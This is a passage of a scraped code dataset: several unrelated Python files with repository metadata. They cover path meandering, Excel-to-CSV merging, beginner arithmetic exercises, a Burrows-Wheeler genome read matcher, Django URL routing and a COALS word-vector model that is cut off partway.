meander, to_bond_points = dummy.find_path(fillet=0.1, is_meander=True, to_meander=[1,0,0,1,1,0,1], meander_length=0.3)
fig, ax = plt.subplots(figsize = (6,12))
#for ii, meander in enumerate(meanders):
ax.plot(np.array(start).T[0],np.array(start).T[1], color='red')
ax.plot(np.array(end).T[0],np.array(end).T[1], color='red')
ax.plot(np.array(meander).T[0],np.array(meander).T[1], 'o-')
for ii, point in enumerate(to_bond_points[:-2][::2]):
ax.plot([to_bond_points[2*ii+1][0], to_bond_points[2*ii+2][0]],[to_bond_points[2*ii+1][1], to_bond_points[2*ii+2][1]], color='g')
#ax.axis('equal')
ax.set_xlim((-0.5,1.5))
ax.set_ylim((-0.5,1.5))
move_figure(fig, -1000, 10)
#
#points_fromIn = [iIn_pos]
#points_fromOut = [iOut_pos]
#point1 = iIn_pos+iIn_ori*0.1
#point2 = iOut_pos+iOut_ori*0.1
#
#
#
#
#
#
#def next_point(point1, point2, vec):
# choice1 = point1+(point2-point1).dot(vec)*vec
# choice2 = point1+(point2-point1).dot(vec.orth())*vec.orth()
# return [[point1, choice1, point2], [point1, choice2, point2]]
#
#
#points_choices = []
#if iIn_ori.dot(iOut_ori)==-1:
# middle_point = (point1 + point2)/2
#
# choice_in = next_point(point1, middle_point, iIn_ori) #bon sens
# choice_out = next_point(point2, middle_point, iOut_ori) #à inverser
## print(choice_in)
## print(choice_out)
# for c_in in choice_in:
# for c_out in choice_out:
# points_choices.append([iIn_pos, *c_in, *c_out[:-1][::-1], iOut_pos])
#else:
# choice_in = next_point(point1, point2, iIn_ori)
# for c_in in choice_in:
# points_choices.append([iIn_pos, *c_in, iOut_pos])
#
#
#def cost_f(x):
# if abs(x-1)<1e-2:
# return 0
# elif abs(x)<1e-2:
# return 1
# else:
# return 100
#
#def check(points):
# points_array = np.array(points)
# vecs = points_array[:-1]-points_array[1:]
#
# cost = 0
# prev_vec = Vector(vecs[0]).unit()
# new_points=[]
# new_points.append(points[0])
# for ii, vec in enumerate(vecs[1:]):
# curr_vec = Vector(vec).unit()
# if curr_vec.dot(prev_vec)==0:
# new_points.append(points[ii+1])
# added_cost = cost_f(prev_vec.dot(curr_vec))
# cost += added_cost
# prev_vec = curr_vec
# new_points.append(points[-1])
# return cost, new_points
#
#final_choice= None
#cost=np.inf
#for choice in points_choices:
# new_cost, new_points = check(choice)
# if new_cost<cost:
# final_choice = new_points
# cost = new_cost
#
#
#
############
##def relative_append(A, vector_list):
## new_vector_list = [A+vector_list[0]]
## for vector in vector_list[1:]:
## new_vector_list.append(new_vector_list[-1]+vector)
## return new_vector_list
##
##def build_meander_list(fillet, vec, n_vec, n):
## if n==0:
## return [vec*fillet].extend(build_meander_list).extend([vec*fillet])
## if n>0:
## if n%2=0:
## return build_meander_list(fillet, vec, n_vec, n-1)
## else:
## return build_meander_list(fillet, vec, -n_vec, n-1)
##
##fillet=0.1
##min_width = 4*fillet
##min_offset = 4*fillet*(np.pi/2-1) #off
##def meander(points, index, number, kind): #index = index segment on which you would like to make meanders
## #kind will be start, middle, end
## n_points = len(points)
## A = points[index]
## B = points[index+1]
## AB = B-A
## vec = way(AB)
## if index==0:
## prev_vec=None
## next_vec = way(points[index+2]-B) # we assume we have at least one corner
## points_to_append = relative_append(A, [vec*fillet, -next_vec*2*fillet, vec*2*fillet, next_vec*2*fillet, vec*fillet])
## points[index+1:index+1] = points_to_append
## elif index==n_points-1:
## prev_vec = way(A-points[index-1])
## next_vec=None
## else:
## prev_vec = way(A-points[index-1])
## next_vec = way(points[index+2]-B)
############
#
##def working_points(points, min_dist, to_meander):
## min_dist = min_dist*1.1
## working_p_start = []
## working_p_end = []
## left_p_start=[points[0]]
## left_p_end=[points[-1]]
## success=False
## index_start = 0
## for ii, point in enumerate(points[1:]):
## A = left_p_start[-1]
## B = point
## AB = B-A
## vec = way(B-A)
## if AB.norm() > min_dist:
## working_p_start.append(A+vec*min_dist/2)
## success = True
## index_start = ii+1
## break
## else:
## left_p_start.append(B)
## to_meander.pop(0)
##
##
## if not success:
## raise ValueError('Could not find points to elongate cable')
##
## success=False
## index_end = 0
## for ii, point in enumerate(points[::-1][1:]):
## A = left_p_end[-1]
## B = point
## AB = B-A
## vec = way(B-A)
## if AB.norm() > min_dist:
## working_p_end.append(A+vec*min_dist/2)
## success = True
## index_end = ii+1
## break
## else:
## left_p_end.append(B)
## to_meander.pop(-1)
##
## if not success:
## raise ValueError('Could not find points to elongate cable')
##
## working_p = working_p_start+points[index_start:-index_end]+working_p_end
## index_insertion = len(left_p_start)
## left_p = left_p_start+left_p_end[::-1]
##
## return working_p, left_p, index_insertion
##
##def right_left(points):
## vecs = []
## A = points[0]
## for B in points[1:]:
## vecs.append(way(B-A))
## A=B
### print(points)
### print(vecs)
## vecA = vecs[0]
## r_l = [0]
## for vecB in vecs[1:]:
## r_l.append(vecA.cross(vecB))
## vecA=vecB
## r_l.append(0)
## return r_l
##
##def add_points(points, rl, min_dist):
## min_dist = min_dist*1.1
## n_points = len(points)
## print(n_points)
## A = points[0]
## new_points =[]
## if n_points==2:
## new_points.append(A)
## B=points[-1]
## vec = way(B-A)
## AB = (B-A).norm()
## n_add = int(AB/min_dist)
## if rl[0]*rl[1]==1 and n_add%2==0:
## n_add=-1
## if rl[0]*rl[1]==-1 and n_add%2==1:
## n_add-=1
## dist = AB/n_add
## new_points+=[A+vec*dist/2]
## new_points+=[A+vec*dist*(jj+1+1/2) for jj in range(n_add-1)]
## rl=None
## indices_corners=None
## else:
## indices_corners=[]
## rl = right_left(points)
### print(rl)
## for ii, B in enumerate(points[1:]):
## new_points.append(A)
## vec = way(B-A)
## AB = (B-A).norm()
## if ii==0 or ii==n_points-2:
## factor = 0.5
## else:
## factor = 1
## n_add = int(AB/min_dist-factor)
## if not(ii==0 or ii==n_points-2):
## if rl[ii-1]*rl[ii]==-1 and n_add%2==1:
## n_add-=1
## if rl[ii-1]*rl[ii]==1 and n_add%2==0:
## n_add-=1
## print(n_add)
## dist = AB/(n_add+factor)
## if n_add>=1:
## if ii==0:
## new_points+=[A+vec*dist/2]
## new_points+=[A+vec*dist*(jj+1+1/2) for jj in range(n_add-1)]
## elif ii!=n_points-2:
## new_points+=[A+vec*dist*(jj+1) for jj in range(n_add)]
## else:
## new_points+=[A+vec*dist*(jj+1) for jj in range(n_add)]
## indices_corners.append(len(new_points))
## A=B
## indices_corners= indices_corners[:-1]
## new_points.append(points[-1])
## return new_points, indices_corners, dist
##
##def displace(points, rl, min_dist, displacement=0):
## if displacement<min_dist:
## displacement = min_dist*1.1
## points, indices_corners, dist = add_points(points, rl, min_dist)
## new_points = [points[0]]
## parity = 1
## if indices_corners is not None:
## for ii, B in enumerate(points[1:-1]):
## A = points[ii]
## AB= B-A
## vec = way(val(AB))
## if ii==0:
## parity = (-2*((indices_corners[0]-(ii+1))%2)+1)*(-rl[0])
## else:
## parity = -parity
## print(parity)
## if ii+1 not in indices_corners:
## #regular point
## new_points[ii+1] = points[ii+1]+vec.orth()*parity*min_dist
## else:
## new_points[ii+1] = points[ii+1]+(vec.orth()*parity+vec).unit()*min_dist
## else:
## if rl[0]!=0:
## parity = -rl[0]
## print(f'parity{parity}')
## else:
## parity = (2*(len(points)%2)-1) * (-rl[1])
## print(f'parity{parity}')
## for ii, B in enumerate(points[1:-1]):
## A=points[ii]
## AB=B-A
## vec=way(val(AB))
## new_points.append(points[ii+1]+vec.orth()*parity*displacement-vec*dist/2)
## new_points.append(points[ii+1]+vec.orth()*parity*displacement+vec*dist/2)
## parity = -parity
## new_points.append(points[-1])
##
##
## return new_points
##
##def meander(points, min_dist, to_meander): # to_meander is list of segments to be meander
## n_points = len(points)
## n_to_meander = len(to_meander)
## if n_points-1>n_to_meander:
## to_meander = to_meander+[0 for ii in range(n_points-1-n_to_meander)]
## else:
## to_meander = to_meander[:n_points-1]
##
## working_p, left_p, index_insertion = working_points(points, min_dist, to_meander)
### print(working_p, left_p, index_insertion)
## rl = right_left(working_p)
## print(to_meander)
## working_ps = []
## for ii, isit in enumerate(to_meander):
## print(ii, isit)
## if isit==1:
## new_working_p = displace(working_p[ii:ii+2], rl[ii:ii+2], min_dist, displacement = min_dist)
## else:
## new_working_p = working_p[ii:ii+2]
## working_ps += new_working_p
##
## left_p[index_insertion:index_insertion] = working_ps
## return left_p#, working_p
##
##
##fillet=0.07
##
##min_dist = 2*fillet
##
###print(final_choice)
##meander = meander(final_choice, min_dist, [0,1,0,5,2,3])
###print(meanders)
#
#
|
[
"[email protected]"
] | |
8db4ec350f45cf94a390fca48b4644c9f2306e89
|
0924e375fa206ae1385fc5a9e44a11bdaf7503cc
|
/t_one.py
|
a444629a3ab7c26f80f8d8b8de7abf24bf418664
|
[] |
no_license
|
heisenberg967/Web_scrap
|
eb9dc92afc25924ae2bec693ccd51a43504dc3ec
|
79a3a70e68d836ce5bf3e1770bc600f671b91d0d
|
refs/heads/master
| 2021-01-25T12:49:45.508348 | 2018-03-02T05:18:41 | 2018-03-02T05:18:41 | 123,516,925 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 439 |
py
|
import glob
import xlrd
import csv
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
xlfiles=glob.glob('D:/Work/Datascience Intern/*.xlsx')
wf = csv.writer(open('D:/Work/Datascience Intern/one.csv','wb'),delimiter=',')
for files in xlfiles:
#print files
workbook = xlrd.open_workbook(files)
sheet = workbook.sheet_by_index(0)
for row in range(1,sheet.nrows):
#print sheet.row_values(row)
wf.writerow(sheet.row_values(row))
|
[
"[email protected]"
] | |
2b67e173c250d907b9ddc4dcbd41582893e80591
|
3933f83fb99f51e01313df27e018a767e26733da
|
/mypython/python练习/变量练习.py
|
ca897e9c3844f647696f31df60427115fc214154
|
[] |
no_license
|
Jacktting/mygit
|
5af7f2f8d80d5113ad68e26bcdf0df14c00fa411
|
fbc3970e817b0eb9080d713e63d55acb6b05d963
|
refs/heads/master
| 2021-03-14T04:50:19.979139 | 2020-05-15T08:25:01 | 2020-05-15T08:25:01 | 246,737,896 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 691 |
py
|
"""
将华氏温度转换为摄氏温度
"""
f = float(input('请输入华氏温度: '))
c = (f - 32) / 1.8
print('%.1f华氏度 = %.1f摄氏度' % (f, c))
"""
输入半径计算圆的周长和面积
"""
import math
radius = float(input('请输入圆的半径: '))
L = 2 * math.pi * radius
area = math.pi * radius * radius
print('周长: %.2f' % L)
print('面积: %.2f' % area)
"""
输入年份 如果是闰年输出True 否则输出False
"""
year = int(input('请输入年份: '))
# 如果代码太长写成一行不便于阅读 可以使用\对代码进行折行
is_leap = (year % 4 == 0 and year % 100 != 0) or \
year % 400 == 0
print(is_leap)
|
[
"[email protected]"
] | |
5c60eef6a651955717d98205494abf3883dce4ee
|
68e7424ef0c78eb773c6b8b858956c8d403099de
|
/Burrow-Wheelers-Transform-Genome-String-Match/sequence_partial_match_detect.py
|
d199d7a46e3ed7da41ae2b83e17289a93a55ffeb
|
[] |
no_license
|
ShubhaShedthikere/Data-Analytics
|
04e20e869579c053601f68e1b29e258e359ebb86
|
e122a3939b91cdda3c05bb420154c8905d8101b4
|
refs/heads/master
| 2021-01-13T13:08:13.658685 | 2016-11-04T14:13:10 | 2016-11-04T14:13:10 | 72,741,825 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 14,851 |
py
|
import numpy as np
import Band as bd
import re
#-------------------------------------------------------------------------------------
#Input Parameters and other input information
exonsBinPositions={149249758:149249869, \
149256128:149256424, \
149258413:149258581, \
149260049:149260214, \
149261769:149262008, \
149264291:149264401, \
149293259:149293555,\
149295543:149295711,\
149297179:149297344,\
149298899:149299138}
readsFileName="reads.txt"
chromosomeFileName=""
#bwtLastColFileName="sampleBWTCol.txt"
bwtLastColFileName="chrX_last_col.txt"
bwtRefFileName="chrX_map.txt"
#bwtRefFileName="sampleBWTRef.txt"
numOfAllowedMismatches=2
numOfCharPerLineBWT=100
numOfLinesSkippedReadSave=100
#-------------------------------------------------------------------------------------
# Global Variables
bwtCol=[]
ACGTBin=[]
ReadMatrixSave=[]
totCountEach=np.zeros(4).astype(int)
firstColStartIndex=np.zeros(4).astype(int)
exonBinReadsCount={}
mapDict=dict({"A":0,"C":1,"G":2,"T":3})
#-------------------------------------------------------------------------------------
# read the BWT last column and create a matrix of cumulative sum
def ReadBWT(bwtLastColFileName,bwtRefFileName):
global bwtCol
global ACGTBin
global ReadMatrixSave
global totCountEach
global bwtRef
global firstColStartIndex
# Load the binary version of the BWT column
linecount=0
print "Loading BWT last column.............."
with open(bwtLastColFileName) as fhand:
for line in fhand:
text=line
#print text
totCountEach[mapDict["A"]]=totCountEach[mapDict["A"]]+line.count("A")
totCountEach[mapDict["C"]]=totCountEach[mapDict["C"]]+line.count("C")
totCountEach[mapDict["G"]]=totCountEach[mapDict["G"]]+line.count("G")
totCountEach[mapDict["T"]]=totCountEach[mapDict["T"]]+line.count("T")
if linecount%numOfLinesSkippedReadSave==0:
ReadMatrixSave.append(list(totCountEach))
bwtCol.append(text.replace("\n",""))
linecount=linecount+1
# print "totCountEach",totCountEach
# print "Num of elements=",len(bwtCol)
# print "ReadMatrixSave=",ReadMatrixSave
#--------------------------------------------------------------------------------------
#It takes the start index, end index and the character of a band of bwt columns
# and returns a binary string of that band which has 1 where the character is
# is present, else 0
def OccuranceFetch(startIndex,endIndex,character):
#print "Inside OccuranceFetch....."
ACGTFetchStartIndex=startIndex/numOfCharPerLineBWT
#print "startIndex=",startIndex,"endIndex=",endIndex
remStart=startIndex%numOfCharPerLineBWT
#print "remStart",remStart
ACGTFetchEndIndex=endIndex/numOfCharPerLineBWT
remEnd=endIndex%numOfCharPerLineBWT
numOfOccurances=0
firstIndex=-1
lastIndex=-1
#print "ACGTFetchStartIndex=",ACGTFetchStartIndex
#print "ACGTFetchEndIndex=",ACGTFetchEndIndex
for i in range(ACGTFetchStartIndex,ACGTFetchEndIndex+1):
#print "i=",i,"bwtCol[i]",bwtCol[i]
if (ACGTFetchStartIndex==ACGTFetchEndIndex):
numOfOccurances= bwtCol[i].count(character,remStart,remEnd+1)
if numOfOccurances!=0:
firstIndex=i*numOfCharPerLineBWT+bwtCol[i].find(character,remStart,remEnd+1)
lastIndex=i*numOfCharPerLineBWT+bwtCol[i].rfind(character,remStart,remEnd+1)
else:
if i==ACGTFetchStartIndex:
numOfOccurances=numOfOccurances+\
bwtCol[i].count(character,remStart)
if numOfOccurances!=0:
firstIndex=i*numOfCharPerLineBWT+bwtCol[i].find(character,remStart)
elif i==ACGTFetchEndIndex:
numOfOccurances=numOfOccurances+\
bwtCol[i].count(character,0,remEnd+1)
if firstIndex==-1 and numOfOccurances!=0:
firstIndex=i*numOfCharPerLineBWT+bwtCol[i].find(character,0,remEnd+1)
else:
numOfOccurances=numOfOccurances+\
bwtCol[i].count(character)
if firstIndex==-1 and numOfOccurances!=0:
firstIndex=i*numOfCharPerLineBWT+bwtCol[i].find(character)
for i in range(ACGTFetchEndIndex,ACGTFetchStartIndex-1,-1):
if (ACGTFetchEndIndex!=ACGTFetchStartIndex):
if i==ACGTFetchEndIndex and bwtCol[i].count(character,0,remEnd+1)!=0 \
and lastIndex==-1:
lastIndex=i*numOfCharPerLineBWT+bwtCol[i].rfind(character,0,remEnd+1)
elif i== ACGTFetchStartIndex and bwtCol[i].count(character,remStart)!=0 \
and lastIndex==-1:
lastIndex=i*numOfCharPerLineBWT+bwtCol[i].rfind(character,remStart)
else:
if lastIndex==-1 and bwtCol[i].count(character)!=0:
lastIndex=i*numOfCharPerLineBWT+bwtCol[i].rfind(character)
#print "firstIndex=",firstIndex,"lastIndex=",lastIndex,"numOfOccurances",numOfOccurances
return firstIndex,lastIndex,numOfOccurances
#--------------------------------------------------------------------------------------
#Rank query
def RankQuery(character,rowIndex):
#print "Inside rank query........"
CharOffset=rowIndex%numOfCharPerLineBWT
BwtColLineNum=rowIndex/numOfCharPerLineBWT
LineOffset=BwtColLineNum%numOfLinesSkippedReadSave
ReadSaveIndex=rowIndex/(numOfLinesSkippedReadSave*numOfCharPerLineBWT)
#print "LineOffset",LineOffset,"ReadSaveIndex",ReadSaveIndex
#print "BwtColLineNum",BwtColLineNum,"CharOffset",CharOffset
#print ReadMatrixSave[ReadSaveIndex]
if LineOffset==0 :
if CharOffset==9:
return ReadMatrixSave[ReadSaveIndex][mapDict[character]]-1
else:
startIndex=rowIndex+1
endIndex=ReadSaveIndex*numOfCharPerLineBWT*numOfLinesSkippedReadSave+\
(numOfCharPerLineBWT-1)
firstIndex,lastIndex,numOfOccurances=OccuranceFetch(startIndex,endIndex,character)
# print "ReadMatrixSave[",ReadSaveIndex,"]",ReadMatrixSave[ReadSaveIndex]
return ReadMatrixSave[ReadSaveIndex][mapDict[character]]-1-numOfOccurances
else:
startIndex= ReadSaveIndex*numOfCharPerLineBWT*numOfLinesSkippedReadSave+\
numOfCharPerLineBWT
endIndex=rowIndex
firstIndex,lastIndex,numOfOccurances=OccuranceFetch(startIndex,endIndex,character)
# print "ReadMatrixSave[",ReadSaveIndex,"]",ReadMatrixSave[ReadSaveIndex]
return ReadMatrixSave[ReadSaveIndex][mapDict[character]]-1+numOfOccurances
#--------------------------------------------------------------------------------------
#Returns the row Indices of the band of the corresponding characters in
#first column
def FindBand(character, minRank,maxRank):
startBandIndex=firstColStartIndex[mapDict[character]]+minRank
return startBandIndex, startBandIndex+(maxRank-minRank)
#--------------------------------------------------------------------------------------
# This function returns the a list of band objects which are the
# valid sub-bands of the given band
def FindSubBands(bandObj,seqChar,maxMismatches):
bandReturnList=[]
indexOfSeqChar0=None
#print "Inside Find Subbands............"
for char in ['A','C','G','T']:
# print "--------------Finding the",char,"-subband of",bandObj.char," ------------------"
# print "bandObj.startIndex=",bandObj.startIndex,"bandObj.endIndex=",bandObj.endIndex
firstIndex,lastIndex,numOfOccurances =OccuranceFetch(bandObj.startIndex,bandObj.endIndex,char)
indexOfSeqChar0=firstIndex
indexOfSeqChar1=lastIndex
if (indexOfSeqChar0== -1):
continue
else:
#for each if the entry in indexOfSeqChar obtain rank
# print "The ranks of ",char," with the rowIndex",firstIndex," and ",lastIndex
minRank=RankQuery(char,indexOfSeqChar0)
maxRank=RankQuery(char,indexOfSeqChar1)
#print "minRank=",minRank,"maxRank=",maxRank
startBandIndex, endBandIndex = FindBand(char,minRank,maxRank)
totBandMismatches = bandObj.mismatches + (char!=seqChar)
if totBandMismatches<=maxMismatches:
newBandObj=bd.Band(char,startBandIndex,endBandIndex,totBandMismatches)
bandReturnList.append(newBandObj)
else:
continue
return bandReturnList
#--------------------------------------------------------------------------------------
# find the position in the reference chromosome
def FindRefPosition(startRowIndex,endRowIndex):
chrName="chrMapFragmentPart"
partNumStart=startRowIndex/100000
remStart=startRowIndex%100000
remEnd=endRowIndex%100000
partNumEnd=endRowIndex/100000
position=[]
if partNumStart==partNumEnd:
#print "only one bwf file loaded"
fileName=chrName+ str(partNumStart)
fhand=open(fileName)
bwtref=fhand.read().split("\n")[:-1]
fhand.close()
position = bwtref[remStart:remEnd+1]
return position
def FindRefPosition1(startRowIndex,endRowIndex):
fhand=open(bwtRefFileName)
bwtRefInp=fhand.read()
fhand.close()
bwtRef=bwtRefInp.split("\n")
# print bwtRef
posi=(np.asarray(bwtRef[startRowIndex:endRowIndex+1]).flatten()).astype(int)
return posi
#--------------------------------------------------------------------------------------
# String Matching Algorithm
# Takes the string input and outputs the index in the original chromosome
def PatternApproxMatch(inpString,maxMismatches=0):
global firstColStartIndex
firstColStartIndex=(np.insert(np.cumsum(totCountEach),0,0)).astype(int)
#print "firstColStartIndex=",firstColStartIndex
# Initializations
seqChar=inpString[-1]
bandList=[]
for char in ['A','C','G','T']:
minRank=0
maxRank=totCountEach[mapDict[char]]-1
startBandIndex, endBandIndex = FindBand(char,minRank,maxRank)
# print "startBandIndex=",startBandIndex, "endBandIndex=", endBandIndex
bandObj=bd.Band(char,startBandIndex,endBandIndex,int(char!=seqChar))
if bandObj.mismatches<=maxMismatches:
bandList.append(bandObj)
# print "bandList=",bandList
# Find the matching bands
for i in range(1,len(inpString)):
seqChar=inpString[-1-i]
# print i,"-th character",seqChar
numOfBandObj=len(bandList)
#print "numOfBandObj",numOfBandObj
bandObjCount=0
while (bandObjCount <numOfBandObj):
# print "inside second alphabet while loop"
bandObj=bandList.pop(0)
bandList.extend(FindSubBands(bandObj,seqChar,maxMismatches))
bandObjCount=bandObjCount+1
# print bandList
#x=raw_input("hit enter when done.....................................................")
#Find the reference indices
#x=raw_input("done bandlist... check bandlist")
#print "bandlist=",bandList
matchPositions=[]
confidenceLevel=[]
for i in range(len(bandList)):
numMisMatches=(np.ones(bandList[i].endIndex-bandList[i].startIndex+1)*bandList[i].mismatches).astype(float)
numMisMatches[numMisMatches>0]=0.5
numMisMatches[numMisMatches==0]=1
posi=(np.asarray(FindRefPosition(bandList[i].startIndex,bandList[i].endIndex)).flatten()).astype(int)
matchPositions.extend(posi)
confidenceLevel.extend(numMisMatches)
# positions=(np.asarray(matchPositions)).astype(int)
readMatchPositions=dict(zip(matchPositions,confidenceLevel))
#print readMatchPositions
return readMatchPositions
#--------------------------------------------------------------------------------------
# Associates each read with the Red and Green Exons depending on the
# matched position
def BinningReads(readMatchPositions,currentRead) :
for (position,confidence) in readMatchPositions.items():
for (startBinIndex,endBinIndex) in exonsBinPositions.items():
if position>=startBinIndex and position+len(currentRead) <=endBinIndex:
exonBinReadsCount[startBinIndex]=exonBinReadsCount[startBinIndex]+confidence
break
#--------------------------------------------------------------------------------------
ReadBWT(bwtLastColFileName,bwtRefFileName)
newkeys=list(exonsBinPositions.keys())
exonBinReadsCount={key:0 for key in newkeys}
counter=0
with open(readsFileName) as readsFileHand:
for currentRead in readsFileHand:
currentRead=currentRead.replace("N","")
currentRead=currentRead.replace("\n","")
# print "Current Read:",currentRead
#print "Read count:",counter
# currentRead="ATTCTACAAATACCCCTCCAGTATATTTCTTTCCCTTTTTTTTGAAGTCTCAGTCTGCCACCCAGGCTGGAGTGCAGTGGTGTGATTTTGGCTCACTGCA"
readMatchPositions=PatternApproxMatch(currentRead,numOfAllowedMismatches)
#print "position=",readMatchPositions
BinningReads(readMatchPositions,currentRead)
print exonBinReadsCount
counter=counter+1
#to determine the probability of colour Blindness
totalCount=0
for i in exonBinReadsCount.values():
totalCount=totalCount+i
#--------------------------------------------------------------------------
#Version 1 : Base version
#Version 2 : Changed fhand= open(readsFileName) to with open(readsFileName)
# : to read the file line by line, that is one read at a time
#Version 3: changed ReadBWT function
# : Added ACGTFetch function
# : changed rank query
# : added accessing file fragments for bwtrefcol
# : using bwtcol directly
|
[
"[email protected]"
] | |
e8760e831ddd791fb10d86687e57cfa46bf7bee3
|
b0a83dd64b74b4f08c7185db03217f7d4c5c8e74
|
/homemate/urls.py
|
3b62169be63523d2e39cc890becaf5fe85dccae5
|
[] |
no_license
|
alice-project/homemate
|
20719307d4238a7a61d9486d495dac41cdf8fe99
|
19783ed2a09581f7c302e60ab0326e8c5b32152b
|
refs/heads/master
| 2020-03-17T10:52:59.833806 | 2018-11-23T14:49:40 | 2018-11-23T14:49:40 | 133,529,107 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 893 |
py
|
"""homemate URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from . import views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^$', views.index, name='index'),
url(r'^mediacenter/', include('mediacenter.urls')),
]
|
[
"[email protected]"
] | |
8a83c4d386fc442c7b152dc26c9c901fd73eb0a9
|
8c777a9fc49358591379ea89bbfe578262e2019c
|
/mrworldwide/search_countries/apps.py
|
f60e1d49e66c6bcd92fc9ee02508a9d65d2cb104
|
[] |
no_license
|
IsmaVerde/PI-Practicas
|
b6b564be473732626921f678aedd4296be3222d2
|
cce47fee2ca817e42b8ed73cb8d3aa400946ba2c
|
refs/heads/main
| 2023-05-30T17:05:36.705360 | 2021-06-18T16:49:18 | 2021-06-18T16:49:18 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 106 |
py
|
from django.apps import AppConfig
class SearchCountriesConfig(AppConfig):
name = 'search_countries'
|
[
"[email protected]"
] | |
777bcb652755bae1483e56e0a6d9753b1cd06756
|
ba1baa3eeaa9df83762125dce4e77e3104b22306
|
/coals.py
|
7c7a93b031f46be6f78d33882cbb4bb554afc653
|
[] |
no_license
|
chien1000/word-vectors-comparison
|
d75d969d8a9ec5d859a63de5b54576bb770ae5bc
|
647680fcc8a5ff0535e8d3d04ee873bfb2ca3b5b
|
refs/heads/master
| 2021-03-24T09:24:45.312315 | 2019-03-16T09:12:03 | 2019-03-16T09:12:03 | 119,685,567 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 9,853 |
py
|
from collections import defaultdict, Counter
import six
from six import string_types
from datetime import datetime
import os
import pickle
from base import get_vocabulary, MODEL_PATH
from hal import HalWordVectorizer, _make_int_array
from corpus import LineCorpus
from stop_words import ENGLISH_CLOSED_CLASS_WORDS
from exceptions import *
import numbers
import numpy as np
import scipy.sparse as sp
from scipy.spatial.distance import cdist
from sklearn.decomposition import TruncatedSVD
from gensim import matutils
class CoalsWordVectorizer(HalWordVectorizer):
"""docstring for CoalsWordVectorizer"""
def __init__(self, window_size = 4, max_features=None, svd_dim=None,
min_count=None, dtype=np.int64):
self.window_size = window_size
self.max_features = max_features
self.svd_dim = svd_dim
if max_features is not None:
if (not isinstance(max_features, numbers.Integral) or
max_features <= 0):
raise ValueError(
"max_features=%r, neither a positive integer nor None"
% max_features)
self.min_count = min_count or 0
if min_count is not None:
if not isinstance(min_count, numbers.Integral):
raise ValueError(
"min_count=%r, neither a integer nor None"
% min_count)
self.stop_words = set(ENGLISH_CLOSED_CLASS_WORDS)
# self.stop_words = None
self.dtype = dtype
def get_dim(self):
if self.svd_dim is not None:
return self.svd_dim
else:
return self.max_features
def get_name(self):
return 'COALS'
def get_mid(self):
mid = '{}_d{}_{}_window_{}'.format(self.get_name(), self.svd_dim, self.max_features, self.window_size)
return mid
def _count_cooccurence(self, docs):
"""Create sparse feature matrix
"""
vocabulary = self.vocabulary
row = _make_int_array()
col = _make_int_array()
values = _make_int_array()
cooccurence_matrix = sp.csc_matrix((len(vocabulary), len(vocabulary)), dtype=self.dtype)
window_size = self.window_size
for doc_id, doc in enumerate(docs):
doc = [t for t in doc.split()]
doc_length = len(doc)
for i, feature in enumerate(doc):
try:
feature_idx = vocabulary[feature]
for j in range(max(i - window_size, 0), min(i + window_size, doc_length-1)+1):
if j == i:
continue
context_word = doc[j]
context_idx = vocabulary[context_word]
row.append(feature_idx)
col.append(context_idx)
diff = abs(j-i)-1
values.append(window_size-diff)
except KeyError:
# Ignore out-of-vocabulary items
continue
batch_size = 10000
if doc_id % batch_size == 0:
values = np.frombuffer(values, dtype=np.intc)
batch_matrix = sp.csc_matrix((values, (row, col)), shape=(len(vocabulary),
len(vocabulary)), dtype=self.dtype)
cooccurence_matrix += batch_matrix
# reset
row = _make_int_array()
col = _make_int_array()
values = _make_int_array()
print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
print('processed #{} docs'.format(doc_id+1))
if len(values) > 0:
values = np.frombuffer(values, dtype=np.intc)
batch_matrix = sp.csc_matrix((values, (row, col)), shape=(len(vocabulary),
len(vocabulary)), dtype=self.dtype)
cooccurence_matrix += batch_matrix
print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
print('processed #{} docs'.format(doc_id+1))
# cooccurence_matrix = cooccurence_matrix.tocsc()
# print(cooccurence_matrix.toarray())
return cooccurence_matrix
def fit_word_vectors(self, corpus_path):
corpus_name = os.path.splitext(os.path.basename(corpus_path))[0]
save_com_path = '{}_{}_mc{}_w{}_com.npz'.format(self.get_name(), corpus_name, self.min_count, self.window_size)
save_com_path = os.path.join(MODEL_PATH, save_com_path)
save_ind2word_path = '{}_{}_mc{}_w{}_ind2word.bin'.format(self.get_name(), corpus_name, self.min_count, self.window_size)
save_ind2word_path = os.path.join(MODEL_PATH, save_ind2word_path)
try:
cooccurence_matrix = sp.load_npz(save_com_path)
with open(save_ind2word_path, 'rb') as fin:
self.ind2word = pickle.load(fin)
self.vocabulary = {w:i for i, w in enumerate(self.ind2word)}
print('load existed cooccurence_matrix and vocab')
print('vocabulary size: {}'.format(len(self.vocabulary)))
except Exception as e:
docs = LineCorpus(corpus_path)
self.ind2word, self.vocabulary = get_vocabulary(docs,
self.min_count, sort_by_frequency=True)
#remove stopwords:
self.ind2word = [w for w in self.ind2word if w not in self.stop_words]
self.vocabulary = {w:i for i, w in enumerate(self.ind2word)}
print('vocabulary size: {}'.format(len(self.vocabulary)))
cooccurence_matrix = self._count_cooccurence(docs)
sp.save_npz(save_com_path, cooccurence_matrix)
with open(save_ind2word_path, 'wb') as fout:
pickle.dump(self.ind2word, fout)
if self.max_features: #discard all but the k columns reflecting the most common open-class words
k = self.max_features
#vocabulary has been ordered by freqeuncy decreasingly
cooccurence_matrix = cooccurence_matrix[:, :k]
#reserved features
self.reserved_features = self.ind2word[:k]
#normalize
##convert counts to word pair correlations
t_sum = cooccurence_matrix.sum()
row_sum = cooccurence_matrix.sum(axis = 1)
col_sum = cooccurence_matrix.sum(axis = 0)
